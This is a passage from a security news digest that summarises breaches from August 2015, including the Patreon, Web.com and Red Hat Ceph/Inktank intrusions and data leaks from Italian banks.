A group of hackers that calls itself “Hack for Trump” claims to have hacked the website of Fidelity Group and threaten it would make the stolen data public unless Fidelity pays $30,000. The hackers plan to use the funds “to help Donald Trump get elected to the White House”.(13) In name of #OpBankDump, Ghost Italy, a local cell of the Anonymous collective, hacks Banca Intesa and Unipol Banca, two of the most important Italian Banks, and leaks several databases, mainly related to external contractors.(14)

Online Services and Ecommerce:

Patreon, the website that allows people to maintain regular donations to a website, an artist, or project, announces to have suffered a security breach. The site says some registered names, e-mail addresses, and mailing addresses were accessed after someone managed to access a “debug version of our website” that at the time was accessible to the public. Unfortunately the attackers leak Gigabyte of data. (15) 0x0D1337 hacks dutchwow.com (a private World of Warcraft server) and dumps 3,917 records containing usernames and hashed passwords.(16)

Frank J. Martin Company notifies an undisclosed number of individuals who made purchases on the Padlocks4Less website that their personal information, including payment card data, may have been accessed without authorization.(17) Red Hat reveals to have suffered an intrusion on the sites of both the Ceph community project (ceph.com) and Inktank (download.inktank.com) that resulted in signed code being accessed.(18)

The name, address, and credit card information of approximately 93,000 customers of Web.com, a popular US-based provider of Internet services to small businesses, is compromised due to a breach of one of the company’s computer systems.(19)

References:

SecurBay Digest 8/15

The month of August was an active month for hackers. We offer a retrospective view of attacks in August 2015, covering three major sectors – Government and Defence, Banking and Allied Sectors and Ecommerce and Online Services.